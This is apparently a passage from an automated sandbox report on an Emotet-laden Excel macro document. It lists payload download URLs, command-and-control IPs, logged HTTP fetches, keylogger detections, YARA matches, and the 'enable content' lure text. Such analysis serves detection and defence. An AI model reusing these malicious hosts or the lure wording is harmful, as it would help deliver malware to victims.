Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwso
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/z
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.f
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvN
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.420721916.0000000003C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/AUhFYYAjKIJ
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.p
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: weezual.fr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1Host: mycloud.suplitecmo.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 28 Jan 2022 19:39:50 GMTcontent-type: text/html; charset=iso-8859-1content-length: 261server: Apachex-iplb-request-id: 66818F3D:C011_D5BA2104:0050_61F44686_C83C:4CC4x-iplb-instance: 31947Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 16.2.rundll32.exe.2d30000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d60000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ef0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e50000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d00000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.320000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3050000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2470000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e80000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3030000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3000000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.af0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e20000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.950000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2bd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2520000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d90000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d60000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3000000.28.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.980000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2df0000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.af0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2860000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.29e0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2df0000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.900000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e80000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c00000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677997537.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677450513.0000000002970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551880508.0000000002FB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677756106.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554134949.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450824461.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.502588343.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551919962.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677929606.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551623719.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499259204.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678314605.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550973971.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551989518.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499994350.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551538985.0000000000901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677111483.0000000000951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677326122.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.502811029.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676639526.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678212374.0000000002D91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676821623.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677356744.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499873731.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554075703.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499710740.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677199098.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676670524.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676732773.0000000000321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678106332.0000000002D31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499733166.00000000008E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678697687.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551472504.0000000000841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677832444.0000000002C31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678494850.0000000003000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551824983.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677505319.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551706896.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551513141.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677680233.0000000002BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678137863.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554395165.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499690055.0000000000881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551450592.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678441464.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499762577.0000000000950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551800161.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550895567.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499359397.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677297499.0000000002471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499783564.0000000000981000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678529505.0000000003031000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678356507.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500113987.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551739042.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500072770.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678048662.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499969504.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499804100.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678386689.0000000002E51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678412347.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet: LINKO contains: mshta
Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet: LINKO contains: mshta
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
